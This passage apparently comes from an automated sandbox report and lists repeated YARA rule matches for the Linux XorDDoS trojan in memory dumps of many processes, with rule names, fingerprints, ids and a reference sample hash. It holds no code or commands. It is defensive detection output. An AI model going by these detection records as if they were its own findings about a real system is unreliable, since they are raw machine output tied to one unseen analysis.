        Source: 6374.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6374.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6453.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6453.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6453.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6453.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6453.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6453.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6508.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6508.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6508.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6508.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6508.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6508.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6464.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6464.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6464.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6464.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6464.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6464.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6241.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6241.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6241.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6241.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6241.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6241.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6529.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6529.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6529.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6529.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6529.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6529.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6548.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6548.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6548.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6548.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6548.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6548.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6265.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6265.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6265.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6265.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6265.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6265.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6505.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6505.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6505.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6505.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6505.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6505.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6527.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6527.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6527.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6527.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6527.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6527.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6411.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6411.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6411.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6411.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6411.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6411.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6439.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6439.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6439.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6439.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6439.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6439.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6340.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
